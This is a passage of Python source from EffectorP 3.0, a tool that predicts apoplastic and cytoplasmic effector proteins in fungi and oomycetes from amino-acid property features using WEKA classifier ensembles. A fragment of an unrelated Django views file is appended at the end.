'/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration25_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration95_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration46_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_J48//trainingdata_iteration77_ratio3.model']\n# -----------------------------------------------------------------------------------------------------------\n# Hydrophobicity (Fauchere and Pliska, 1983)\nHYDRO_DIC = {\n'R': -1.01,\n'K': -0.99, \n'D': -0.77, \n'E': -0.64, \n'N': -0.6,\n'Q': -0.22, \n'S': -0.04, \n'G': -0.0, \n'H': 0.13, \n'T': 0.26, \n'A': 0.31, \n'P': 0.72, \n'Y': 0.96, \n'V': 1.22,\n'C': 1.54, \n'L': 1.7, \n'F': 1.79, \n'I': 1.8, \n'M': 1.23 , \n'W': 2.25}\n\n# Taken from http://www.cprofiler.org/help.html\n# Surface exposure (Janin, 1979), these are free energy values\nEXPOSED_DIC = {\n'A': 0.3, \n'R': -1.4,\n'N': -0.5,\n'D': -0.6, \n'C': 0.9, \n'Q': -0.7, \n'E': -0.7, \n'G': 0.3, \n'H': -0.1, \n'I': 0.7, \n'L': 0.5, \n'K': -1.8, \n'M': 0.4, \n'F': 0.5, \n'P': -0.3, \n'S': -0.1, \n'T': -0.2, \n'W': 0.3, \n'Y': -0.4, \n'V': 0.6}\n\n# Flexibility (Vihinen et al., 1994)\nFLEX_DIC = {\n'A': 0.984, \n'R': 1.008,\n'N': 1.048,\n'D': 1.068, \n'C': 0.906, \n'Q': 1.037, \n'E': 1.094, \n'G': 1.031, \n'H': 0.950, \n'I': 0.927, \n'L': 0.935, \n'K': 1.102, \n'M': 0.952, \n'F': 0.915, \n'P': 1.049, \n'S': 1.046, \n'T': 0.997, \n'W': 0.904, \n'Y': 0.929, \n'V': 0.931}\n\n# Alpha helix frequency (Nagano, 1973)\nALPHA_DIC = {\n'Y': 0.63, \n'P': 0.70, \n'G': 0.72,\n'N': 0.77,\n'S': 0.78,\n'R': 0.83,\n'T': 0.87,\n'C': 0.94,\n'I': 0.94,\n'V': 0.97,\n'D': 1.00,\n'W': 1.06,\n'Q': 1.10,\n'L': 1.23,\n'K': 1.23,\n'M': 1.23,\n'F': 1.23,\n'A': 1.29,\n'H': 1.29,\n'E': 1.54}\n\n# Beta structure frequency (Nagano, 1973)\nBETA_DIC = {\n'Y': 1.07, \n'P': 0.75, \n'G': 0.9,\n'N': 0.72,\n'S': 0.77,\n'R': 0.67,\n'T': 1.23,\n'C': 1.13,\n'I': 1.54,\n'V': 1.41,\n'D': 0.9,\n'W': 1.13,\n'Q': 1.18,\n'L': 1.26,\n'K': 0.81,\n'M': 1.29,\n'F': 1.37,\n'A': 0.96,\n'H': 0.87,\n'E': 0.33}\n\n# Coil propensity (Nagano, 1973)\nCOIL_DIC = {\n 'F' : 0.58,\n 'M' : 0.62,\n 'L' : 0.63, \n 'A' : 0.72,\n 'E' : 0.75,\n 'H' : 0.76,\n 'I' : 0.8, \n 'Q' : 0.81, \n 'V' : 0.83, \n 'K' : 0.84, \n 'W' : 0.87, \n 'C' : 1.01, \n 'T' : 1.03, \n 'D' : 1.04,\n 'R' : 1.33, \n 'S' : 1.34, \n 'G' : 1.35, \n 'Y' : 1.35, \n 'N' : 1.38, \n 'P' : 1.43}\n\n# Polarity (Zimmerman et al., 1968)\nPOLARITY_DIC = {\n'Y': 1.61, \n'P': 1.58, \n'G': 0.0,\n'N': 3.38,\n'S': 1.67,\n'R': 52.0,\n'T': 1.66,\n'C': 1.48,\n'I': 0.13,\n'V': 0.13,\n'D': 49.7,\n'W': 2.1,\n'Q': 3.53,\n'L': 0.13,\n'K': 49.5,\n'M': 1.43,\n'F': 0.35,\n'A': 0.0,\n'H': 51.6,\n'E': 49.9}\n\n# Disorder propensity (Dunker et al., 2001)\nDISORDER_DIC = {\n'A': 1.0,\n'R': 1.0,\n'S': 1.0,\n'Q': 1.0,\n'E': 1.0,\n'G': 1.0,\n'K': 1.0,\n'P': 1.0,\n'D': 0.0,\n'H': 0.0,\n'M': 0.0,\n'T': 0.0,\n'N': -1.0,\n'C': -1.0,\n'I': -1.0,\n'L': -1.0,\n'F': -1.0,\n'W': -1.0,\n'Y': -1.0,\n'V': -1.0}\n\n# Bulkiness (Zimmerman et al., 1968)\nBULKY_DIC = {\n'G' : 3.4,\n'S' : 9.47, \n'A' : 11.5, \n'D' : 11.68, \n'N' : 12.82, \n'C' : 13.46, \n'E' : 13.57, \n'H' : 13.69, \n'R' : 14.28,\n'Q' : 14.45, \n'K' : 15.71, \n'T' : 15.77,\n'M' : 16.25, \n'P' : 17.43,\n'Y' : 18.03, \n'F' : 19.8, \n'I' : 21.4,\n'L' : 21.4, \n'V' : 21.57, \n'W' : 21.67} \n\n# Charged amino acids, 1 are positively charged residues (K, 
R); -1 are negatively charged residues (D, E)\nCHARGE_DIC = {\n 'K' : 1,\n 'R' : 1,\n 'D' : -1,\n 'E' : -1}\n\n# Polarity (Zimmerman et al., 1968)\nPOLARITY_DIC = {\n 'A' : 0.0,\n 'G' : 0.0,\n 'I' : 0.13,\n 'L' : 0.13,\n 'V' : 0.13,\n 'F' : 0.35,\n 'M' : 1.43,\n 'C' : 1.48,\n 'P' : 1.58,\n 'Y' : 1.61,\n 'T' : 1.66,\n 'S' : 1.67,\n 'W' : 2.1,\n 'N' : 3.38,\n 'Q' : 3.53,\n 'K' : 49.5,\n 'D' : 49.7,\n 'E' : 49.9,\n 'H' : 51.6,\n 'R' : 52.0}\n\nMOLECULAR_WEIGHT_DIC = {\n'A': 71.0788,\n'B': 114.5962,\n'C': 103.1388,\n'D': 115.0886,\n'E': 129.1155,\n'F': 147.1766,\n'G': 57.0519,\n'H': 137.1411,\n'I': 113.1594,\n'J': 113.1594,\n'K': 128.1741,\n'L': 113.1594,\n'M': 131.1926,\n'N': 114.1038,\n'O': 237.3018,\n'P': 97.1167,\n'Q': 128.1307,\n'R': 156.1875,\n'S': 87.0782,\n'T': 101.1051,\n'U': 150.0388,\n'V': 99.1326,\n'W': 186.2132,\n'X': 118.8860,\n'Y': 163.1760,\n'Z': 128.6231} \n# -----------------------------------------------------------------------------------------------------------\n\n# -----------------------------------------------------------------------------------------------------------\n# Functions\n# -----------------------------------------------------------------------------------------------------------\ndef usage():\n \"\"\" Function: usage()\n Purpose: Print helpful information for the user. \n \n Input: None.\n \n Return: Print options for running EffectorP 3.0. \n \"\"\"\n print('''\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# EffectorP 3.0: Prediction of apoplastic and cytoplasmic effectors in fungi and oomycetes\n# http://effectorp.csiro.au/\n# Copyright (C) 2021-2022 Jana Sperschneider.\n# Freely distributed under the GNU General Public License (GPLv3).\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n ''')\n print(\"Usage for EffectorP 3.0: \")\n print(\"python EffectorP.py [-options] -i \")\n print()\n print(\"where basic options are:\")\n print(\"-f : run in fungal mode\") \n print(\"-h : show brief help on version and usage\")\n print()\n print(\"options directing output:\")\n print(\"-o : direct tab-delimited output table with predictions to file , not stdout\")\n print(\"-E : save predicted effectors to FASTA file \") \n print(\"-N : save predicted non-effectors to FASTA file \") \n print()\n print(\"# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\")\n print()\n sys.exit() \n\n return\n# -----------------------------------------------------------------------------------------------------------\ndef scan_arguments(commandline):\n \"\"\" Function: scan_arguments()\n Purpose: Scan the input options given to the EffectorP program. 
\n \n Input: Input options given by the user.\n \n Return: Parsed options.\n \"\"\"\n try:\n opts, args = getopt.getopt(commandline, \"hfso:E:N:i:\", [\"help\"]) \n except getopt.GetoptError as err:\n # print help information and exit:\n print(str(err)) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\n\n FASTA_FILE = None\n output_file = None\n effector_output = None\n noneffector_output = None\n FUNGAL_MODE = False\n\n i_count, o_count, E_count, N_count, P_count = 0, 0, 0, 0, 0\n \n for opt, arg in opts:\n if opt in (\"-o\"):\n output_file = arg\n o_count += 1\n elif opt in (\"-f\"):\n FUNGAL_MODE = True \n elif opt in (\"-i\"):\n FASTA_FILE = arg\n i_count += 1\n elif opt in (\"-E\"):\n effector_output = arg\n E_count += 1\n elif opt in (\"-N\"):\n noneffector_output = arg\n N_count += 1\n elif opt in (\"-h\", \"--help\"):\n usage()\n else:\n print()\n print (\"Commandline option was supplied that was not recognized!\")\n usage()\n\n if i_count > 1 or o_count > 1 or E_count > 1 or N_count > 1:\n usage()\n\n return FASTA_FILE, FUNGAL_MODE, output_file, effector_output, noneffector_output\n# -----------------------------------------------------------------------------------------------------------\ndef SimpleFastaParser(handle):\n for line in handle:\n if line[0] == \">\":\n title = line[1:].rstrip()\n break\n\n lines = []\n for line in handle:\n if line[0] == \">\":\n yield title, \"\".join(lines).replace(\" \", \"\").replace(\"\\r\", \"\")\n lines = []\n title = line[1:].rstrip()\n continue\n lines.append(line.rstrip())\n\n yield title, \"\".join(lines).replace(\" \", \"\").replace(\"\\r\", \"\")\n# -----------------------------------------------------------------------------------------------------------\ndef get_effector_predictions(ORIGINAL_IDENTIFIERS, SEQUENCES, EFFECTOR_THRESHOLD, ensembl_votes_cytoplasmic, ensembl_votes_apoplastic):\n\n models_cytoplasmic = models_bayes_cytoplasmic + models_J48_cytoplasmic\n models_apoplastic = models_bayes_apoplastic + models_J48_apoplastic\n\n ensemble_predictions, predicted_effectors, predicted_noneffectors = [], [], []\n cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors = {}, {}, {}, {}\n\n for index, (ident, seq) in enumerate(zip(ORIGINAL_IDENTIFIERS, SEQUENCES)):\n\n # Be careful to use this short identifier later, \n # if all identifiers are equal, predictions will fail if not used\n short_ident = 'protein' + str(index)\n yes_prob_cytoplasmic, no_prob_cytoplasmic = [], []\n yes_prob_apoplastic, no_prob_apoplastic = [], []\n\n for vote, prob in ensembl_votes_cytoplasmic[short_ident]:\n\n if vote == 'Non-effector':\n no_prob_cytoplasmic.append(prob)\n yes_prob_cytoplasmic.append(1.0 - prob) \n\n if vote == 'Effector':\n yes_prob_cytoplasmic.append(prob)\n no_prob_cytoplasmic.append(1.0 - prob) \n\n for vote, prob in ensembl_votes_apoplastic[short_ident]:\n\n if vote == 'Non-effector':\n no_prob_apoplastic.append(prob)\n yes_prob_apoplastic.append(1.0 - prob) \n\n if vote == 'Effector':\n yes_prob_apoplastic.append(prob)\n no_prob_apoplastic.append(1.0 - prob) \n\n # Soft voting: argmax of the sum of predicted probabilities\n yes_prob_cytoplasmic = round(sum(yes_prob_cytoplasmic)/float(len(models_cytoplasmic)),3)\n no_prob_cytoplasmic = round(sum(no_prob_cytoplasmic)/float(len(models_cytoplasmic)),3)\n yes_prob_apoplastic = round(sum(yes_prob_apoplastic)/float(len(models_apoplastic)),3)\n no_prob_apoplastic = round(sum(no_prob_apoplastic)/float(len(models_apoplastic)),3) \n\n 
cytoplasmic_prediction = False\n apoplastic_prediction = False\n\n if yes_prob_cytoplasmic >= EFFECTOR_THRESHOLD or yes_prob_apoplastic >= EFFECTOR_THRESHOLD:\n # Is it more likely a cytoplasmic effector\n if yes_prob_cytoplasmic >= yes_prob_apoplastic:\n\n if yes_prob_apoplastic >= EFFECTOR_THRESHOLD:\n prediction = 'Cytoplasmic effector (apoplastic effector: ' + str(yes_prob_apoplastic) + ')'\n prob = yes_prob_cytoplasmic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n cyto_apo_effectors[short_ident] = [yes_prob_cytoplasmic, yes_prob_apoplastic, seq] \n else:\n prediction = 'Cytoplasmic effector'\n prob = yes_prob_cytoplasmic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n cyto_effectors[short_ident] = [yes_prob_cytoplasmic, seq] \n\n # Is it more likely an apoplastic effector \n if yes_prob_apoplastic > yes_prob_cytoplasmic:\n\n if yes_prob_cytoplasmic >= EFFECTOR_THRESHOLD:\n prediction = 'Apoplastic effector (cytoplasmic effector: ' + str(yes_prob_cytoplasmic) + ')'\n prob = yes_prob_apoplastic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n apo_cyto_effectors[short_ident] = [yes_prob_apoplastic, yes_prob_cytoplasmic, seq] \n\n else:\n prediction = 'Apoplastic effector'\n prob = yes_prob_apoplastic\n predicted_effectors.append((ident.strip(), yes_prob_cytoplasmic, yes_prob_apoplastic, seq)) \n apo_effectors[short_ident] = [yes_prob_apoplastic, seq] \n\n if yes_prob_cytoplasmic < EFFECTOR_THRESHOLD and yes_prob_apoplastic < EFFECTOR_THRESHOLD:\n prediction = 'Non-effector'\n prob = round(min(no_prob_cytoplasmic, no_prob_apoplastic),3)\n predicted_noneffectors.append((ident.strip(), prob, seq))\n\n ensemble_predictions.append((ident.strip(), prediction, prob, seq)) \n\n return ensemble_predictions, predicted_effectors, predicted_noneffectors, cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors\n# ----------------------------------------------------------------------------------------------------------- \ndef get_model_predictions(WEKA_PATH, RESULTS_PATH, MODELS, CLASSIFIER, ensembl_votes, ORIGINAL_IDENTIFIERS, SEQUENCES):\n\n for model in MODELS:\n #--------------------------------------------------------------\n ParamList = ['java', '-cp', WEKA_PATH, CLASSIFIER, '-l', model, '-T', RESULTS_PATH + 'weka.arff', '-p', 'first-last']\n\n with open(RESULTS_PATH + 'Predictions.txt', 'wb') as out:\n try:\n Process = subprocess.Popen(ParamList, shell=False, stdout=out)\n sts = Process.wait()\n cstdout, cstderr = Process.communicate()\n\n if Process.returncode:\n raise Exception(\"Calling WEKA returned %s\"%Process.returncode)\n if cstdout:\n pass\n elif cstderr:\n sys.exit()\n except:\n e = sys.exc_info()[1]\n print(\"Error calling WEKA: %s\" % e)\n sys.exit(1)\n #-------------------------------------------------------------- \n # Parse the WEKA output file\n file_input = RESULTS_PATH + 'Predictions.txt'\n predicted_effectors, predicted_noneffectors, predictions = parse_weka_output(file_input, ORIGINAL_IDENTIFIERS, SEQUENCES)\n \n for index, (ident, prediction, prob, seq) in enumerate(predictions):\n\n short_ident = 'protein' + str(index)\n\n if short_ident in ensembl_votes:\n previous_predictions = ensembl_votes[short_ident] \n ensembl_votes[short_ident] = previous_predictions + [(prediction, prob)]\n else:\n ensembl_votes[short_ident] = [(prediction, prob)]\n\n return ensembl_votes\n# 
----------------------------------------------------------------------------------------------------------- \ndef write_weka_input(weka_input, SHORT_IDENTIFIERS, SEQUENCES):\n \"\"\" Function: write_weka_input()\n Purpose: Given the query identifiers and \n protein features, write the input arff file for WEKA. \n \n Input: WEKA arff file name, query identifiers. \n \n Return: None. \n \"\"\" \n with open(weka_input, 'w') as f:\n # Create a list of features for each protein\n X = [[] for __ in range(len(SHORT_IDENTIFIERS))]\n\n for protein_position, TARGET_ID in enumerate(SHORT_IDENTIFIERS):\n TARGET_ID = TARGET_ID.replace('>', '')\n TARGET_ID = TARGET_ID.strip()\n sequence = SEQUENCES[protein_position]\n\n length = len(sequence)\n\n # Amino acid frequencies in the sequence\n amino_acid_frequencies = []\n amino_acid_frequencies.append(100.0*sequence.count('A')/length)\n amino_acid_frequencies.append(100.0*sequence.count('C')/length)\n amino_acid_frequencies.append(100.0*sequence.count('D')/length)\n amino_acid_frequencies.append(100.0*sequence.count('E')/length)\n amino_acid_frequencies.append(100.0*sequence.count('F')/length)\n amino_acid_frequencies.append(100.0*sequence.count('G')/length)\n amino_acid_frequencies.append(100.0*sequence.count('H')/length)\n amino_acid_frequencies.append(100.0*sequence.count('I')/length)\n amino_acid_frequencies.append(100.0*sequence.count('K')/length)\n amino_acid_frequencies.append(100.0*sequence.count('L')/length)\n amino_acid_frequencies.append(100.0*sequence.count('M')/length)\n amino_acid_frequencies.append(100.0*sequence.count('N')/length)\n amino_acid_frequencies.append(100.0*sequence.count('P')/length)\n amino_acid_frequencies.append(100.0*sequence.count('Q')/length)\n amino_acid_frequencies.append(100.0*sequence.count('R')/length)\n amino_acid_frequencies.append(100.0*sequence.count('S')/length)\n amino_acid_frequencies.append(100.0*sequence.count('T')/length)\n amino_acid_frequencies.append(100.0*sequence.count('V')/length)\n amino_acid_frequencies.append(100.0*sequence.count('W')/length)\n amino_acid_frequencies.append(100.0*sequence.count('Y')/length)\n\n\n molecular_weight = MOLECULAR_WEIGHT(sequence)\n percent_positively_charged, percent_negatively_charged, charge = CHARGE(sequence)\n exposed = EXPOSED(sequence)\n hydrophobicity = HYDROPHOBICITY(sequence) \n polarity = POLARITY(sequence)\n flexibility = FLEX(sequence)\n aromatic = 100.0*(sequence.count('F') + sequence.count('H') + sequence.count('W') + sequence.count('Y'))/length\n polar = 100.0*(sequence.count('D') + sequence.count('E') + sequence.count('H') + sequence.count('K') + sequence.count('N') + sequence.count('Q') + sequence.count('R') + sequence.count('S') + sequence.count('T') + sequence.count('Z'))/length\n disorder = DISORDER(sequence)\n bulky = BULKY(sequence)\n alpha = ALPHA(sequence)\n beta = BETA(sequence)\n coil = COIL(sequence)\n\n X[protein_position] = amino_acid_frequencies + [molecular_weight, percent_positively_charged, percent_negatively_charged, exposed] \n X[protein_position] += [hydrophobicity, polarity, flexibility] + [aromatic, polar, disorder, bulky] + [alpha, beta, coil]\n\n # Write protein feature data to WEKA arff file\n f.writelines(ARFF_HEADER)\n for index, vector in enumerate(X):\n for feature in vector:\n f.writelines(str(feature) + ',')\n f.writelines('?\\n')\n\n return\n# -----------------------------------------------------------------------------------------------------------\ndef MOLECULAR_WEIGHT(sequence):\n\n molecular_weight = 0.0\n\n for aa in 
sequence:\n if aa.upper() in MOLECULAR_WEIGHT_DIC:\n molecular_weight += MOLECULAR_WEIGHT_DIC[aa.upper()]\n\n return molecular_weight \n# -----------------------------------------------------------------------------------------------------------\ndef HYDROPHOBICITY(sequence):\n\n hydrophobicity = 0\n\n for aa in sequence:\n if aa.upper() in HYDRO_DIC:\n hydrophobicity += HYDRO_DIC[aa.upper()]\n\n return hydrophobicity/len(sequence) \n# -----------------------------------------------------------------------------------------------------------\ndef FLEX(sequence):\n \n flexibility = 0.0\n for aa in sequence:\n if aa.upper() in FLEX_DIC:\n flexibility += FLEX_DIC[aa.upper()]\n\n return flexibility/len(sequence) \n# -----------------------------------------------------------------------------------------------------------\ndef CHARGE(sequence):\n\n positively_charged, negatively_charged, charge = 0, 0, 0\n\n for aa in sequence:\n if aa.upper() in CHARGE_DIC:\n if CHARGE_DIC[aa.upper()] == 1:\n positively_charged += 1\n charge += 1\n if CHARGE_DIC[aa.upper()] == -1:\n negatively_charged += 1\n charge += -1\n if aa.upper() == 'H':\n charge += 0.5\n\n return 100.0*(positively_charged)/len(sequence), 100.0*(negatively_charged)/len(sequence), charge/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef POLARITY(sequence):\n\n polarity = 0\n\n for aa in sequence:\n if aa.upper() in POLARITY_DIC:\n polarity += POLARITY_DIC[aa.upper()]\n\n return polarity/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef DISORDER(sequence):\n \n disorder = 0.0\n for aa in sequence:\n if aa.upper() in DISORDER_DIC:\n disorder += DISORDER_DIC[aa.upper()]\n\n return disorder/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef EXPOSED(sequence):\n \n exposed = 0.0\n for aa in sequence:\n if aa.upper() in EXPOSED_DIC:\n exposed += EXPOSED_DIC[aa.upper()]\n\n return exposed/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef ALPHA(sequence):\n\n alpha = 0.0\n for aa in sequence:\n if aa.upper() in ALPHA_DIC:\n alpha += ALPHA_DIC[aa.upper()]\n\n return alpha/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef BETA(sequence):\n \n beta = 0.0\n for aa in sequence:\n if aa.upper() in BETA_DIC:\n beta += BETA_DIC[aa.upper()]\n\n return beta/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef COIL(sequence):\n \n coil = 0.0\n for aa in sequence:\n if aa.upper() in COIL_DIC:\n coil += COIL_DIC[aa.upper()]\n\n return coil/len(sequence) \n# -----------------------------------------------------------------------------------------------------------\ndef BULKY(sequence):\n \n bulky = 0.0\n for aa in sequence:\n if aa.upper() in BULKY_DIC:\n bulky += BULKY_DIC[aa.upper()]\n\n return bulky/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef write_FASTA_short_ids(f_output, ORIGINAL_IDENTIFIERS, ORIGINAL_SEQUENCES):\n \"\"\" Function: write_FASTA_short_ids()\n Purpose: Given a list of identifiers and the corresponding list \n of sequence, write these to a FASTA file using short\n identifiers such as 
protein1, protein2, .... This is \n done because some programs like pepstats do not like \n long identifier names as input.\n \n Input: Path to desired FASTA format output file, list of \n identifiers and list of corresponding sequences.\n \n Return: List of short identifiers.\n \"\"\"\n\n with open(f_output, 'w') as f:\n SHORT_IDENTIFIERS = []\n # Change identifiers to protein1, protein2, ...\n # and write to temporary file\n SET = zip(ORIGINAL_IDENTIFIERS, ORIGINAL_SEQUENCES)\n \n for index, (identifier, sequence) in enumerate(SET):\n short_id = '>protein' + str(index)\n SHORT_IDENTIFIERS.append(short_id)\n f.writelines(short_id + '\\n')\n f.writelines(sequence + '\\n')\n\n return SHORT_IDENTIFIERS\n# -----------------------------------------------------------------------------------------------------------\ndef parse_weka_output(file_input, ORIGINAL_IDENTIFIERS, SEQUENCES):\n \"\"\" Function: parse_weka_output()\n Purpose: Given the WEKA output file and the query identifiers and sequences, \n parse the predicted class for each protein from the WEKA output. \n Write the predicted effectors to a FASTA file.\n \n Input: WEKA output file and the query identifiers and sequences. \n \n Return: The set of predicted effectors only as well as all predictions. \n \"\"\" \n predicted_effectors, predicted_noneffectors, predictions = [], [], []\n\n with open(file_input) as f:\n\n content = f.readlines()\n\n content_start = content.index(' inst# actual predicted error prediction (A,C,D,E,F,G,H,I,K,L,M,N,P,Q,R,S,T,V,W,Y,MolecularWeight,PosCharge,NegCharge,Exposed,Hydrophobicity,polarity,flexibility,aromatic,polar,disorder,Bulky,Alpha,Beta,Coil)\\n')\n\n content = content[content_start + 1:]\n\n for line in content:\n if line.strip():\n position = line.split()[0]\n prediction = line.split()[2]\n prob = float(line.split()[3]) \n \n # WEKA output counts from position 1, our identifiers are counted from zero\n identifier = ORIGINAL_IDENTIFIERS[int(position) - 1]\n sequence = SEQUENCES[int(position) - 1]\n\n if 'non-eff' in prediction: \n noneffector = identifier.strip()\n noneffector = noneffector.replace('>', '') \n predictions.append((noneffector, 'Non-effector', prob, sequence))\n predicted_noneffectors.append((noneffector, prob, sequence))\n else: \n effector = identifier.strip()\n effector = effector.replace('>', '') \n predictions.append((effector, 'Effector', prob, sequence))\n # Append predicted effector to list of predicted effectors\n predicted_effectors.append((effector, prob, sequence))\n\n return predicted_effectors, predicted_noneffectors, predictions\n# -----------------------------------------------------------------------------------------------------------\ndef short_output_screen(predictions, cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors):\n \"\"\" Function: short_output_screen()\n Purpose: Given the WEKA predictions for each protein, write \n string that contains the short output format.\n \n Input: WEKA predictions for each protein. 
\n \n Return: String that contains predictions for all proteins as tab-delimited table.\n \"\"\"\n # Output predictions for all proteins as tab-delimited table\n\n col_width = max(len(protein) for protein, pred, prob, sequence in predictions) + 1 # padding\n col_width = max(col_width, 10)\n pred_col_width = 20\n\n short_output_string = \"\".join(\"# Identifier\".ljust(col_width)) + '\\t' \n short_output_string += \"\".join(\"Cytoplasmic effector\".ljust(pred_col_width)) + '\\t' \n short_output_string += \"\".join(\"Apoplastic effector\".ljust(pred_col_width)) + '\\t' \n short_output_string += \"\".join(\"Non-effector\".ljust(pred_col_width)) + '\\t' \n short_output_string += \"\".join(\"Prediction\".ljust(pred_col_width)) + '\\n' \n\n for index, (protein, pred, prob, sequence) in enumerate(predictions): \n\n short_ident = 'protein' + str(index)\n if short_ident in cyto_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + 'Y' + ' (' + str(prob) + ') ' + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t'\n short_output_string += \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Cytoplasmic effector' + '\\n' \n elif short_ident in apo_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Y' + ' (' + str(prob) + ') ' + '\\t' \n short_output_string += \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Apoplastic effector' + '\\n' \n elif short_ident in cyto_apo_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + 'Y' + ' (' + str(cyto_apo_effectors[short_ident][0])+ ') ' + '\\t' \n short_output_string += 'Y' + ' (' + str(cyto_apo_effectors[short_ident][1]) + ') ' + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Cytoplasmic/apoplastic effector' + '\\n' \n elif short_ident in apo_cyto_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + 'Y' + ' (' + str(apo_cyto_effectors[short_ident][1])+ ') ' + '\\t' \n short_output_string += 'Y' + ' (' + str(apo_cyto_effectors[short_ident][0]) + ') ' + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Apoplastic/cytoplasmic effector' + '\\n' \n else:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' \n short_output_string += 'Y' + ' (' + str(prob) + ') ' + '\\t' + 'Non-effector' + '\\n' \n\n\n return short_output_string\n# -----------------------------------------------------------------------------------------------------------\ndef short_output_file(predictions, cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors):\n \"\"\" Function: short_output_file()\n Purpose: Given the WEKA predictions for each protein, write \n string that contains the short output format.\n \n Input: WEKA predictions for each protein. 
\n \n Return: String that contains predictions for all proteins as tab-delimited table.\n \"\"\"\n # Output predictions for all proteins as tab-delimited table\n\n\n short_output_string = \"# Identifier\" + '\\t' + \"Cytoplasmic effector\" + '\\t' \n short_output_string += \"Apoplastic effector\" + '\\t' \n short_output_string += \"Non-effector\" + '\\t' \n short_output_string += \"Prediction\" + '\\n' \n\n for index, (protein, pred, prob, sequence) in enumerate(predictions): \n\n short_ident = 'protein' + str(index)\n \n if short_ident in cyto_effectors:\n short_output_string += protein + '\\t' + 'Y' + ' (' + str(prob) + ')' + '\\t' + '-' + '\\t'\n short_output_string += '-' + '\\t' + 'Cytoplasmic effector' + '\\n' \n elif short_ident in apo_effectors:\n short_output_string += protein + '\\t' + '-' + '\\t' + 'Y' + ' (' + str(prob) + ')' + '\\t' \n short_output_string += '-' + '\\t' + 'Apoplastic effector' + '\\n' \n elif short_ident in cyto_apo_effectors:\n short_output_string += protein + '\\t' + 'Y' + ' (' + str(cyto_apo_effectors[short_ident][0]) + ')' + '\\t' \n short_output_string += 'Y' + ' (' + str(cyto_apo_effectors[short_ident][1]) + ')' + '\\t' + '-' + '\\t' + 'Cytoplasmic/apoplastic effector' + '\\n' \n elif short_ident in apo_cyto_effectors:\n short_output_string += protein + '\\t' + 'Y' + ' (' + str(apo_cyto_effectors[short_ident][1]) + ')' + '\\t' \n short_output_string += 'Y' + ' (' + str(apo_cyto_effectors[short_ident][0]) + ')' + '\\t' + '-' + '\\t' + 'Apoplastic/cytoplasmic effector' + '\\n' \n else:\n short_output_string += protein + '\\t' + '-' + '\\t' + '-' + '\\t' \n short_output_string += 'Y' + ' (' + str(prob) + ')' + '\\t' + 'Non-effector' + '\\n' \n\n\n return short_output_string \n# -----------------------------------------------------------------------------------------------------------\ndef long_output(ORIGINAL_IDENTIFIERS, predicted_effectors):\n \"\"\" Function: long_output()\n Purpose: Given the predicted effectors and identifiers for the test set, \n write string that contains the long output format.\n \n Input: Predicted effectors and identifiers of test set. \n \n Return: String that contains list of predicted effectors with posterior probabilites\n and a short statistic on the percentage of predicted effectors in the test set.\n \"\"\"\n # Output predicted effectors for long format\n long_output_string = '-----------------\\n'\n long_output_string += 'Predicted effectors:\\n\\n'\n for effector, prob, sequence in predicted_effectors:\n long_output_string += effector + '| Effector probability:' + str(prob) + '\\n'\n\n long_output_string += '-----------------\\n\\n'\n long_output_string += 'Number of proteins that were tested: ' + str(len(ORIGINAL_IDENTIFIERS)) + '\\n' \n long_output_string += 'Number of predicted effectors: ' + str(len(predicted_effectors)) + '\\n' \n long_output_string += '\\n' + '-----------------' + '\\n' \n long_output_string += str(round(100.0*len(predicted_effectors)/len(ORIGINAL_IDENTIFIERS), 1)) + ' percent are predicted to be effectors.' 
\n long_output_string += '\\n' + '-----------------' + '\\n'\n\n return long_output_string\n# -----------------------------------------------------------------------------------------------------------","repo_name":"JanaSperschneider/EffectorP-3.0","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":43287,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"8655285829","text":"from game.models import Game, Campionat, News, Team, Player\nfrom django.db.models import Q\nfrom django.shortcuts import render\nfrom django.core.paginator import Paginator\nfrom django.template.loader import get_template\nfrom django.http import HttpResponse\nfrom django.template import Context\nimport datetime\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\nfrom django.core.urlresolvers import reverse\n\n\ndef create_breadcrumbs(crumbs):\n \"\"\"\n This is a function for creating 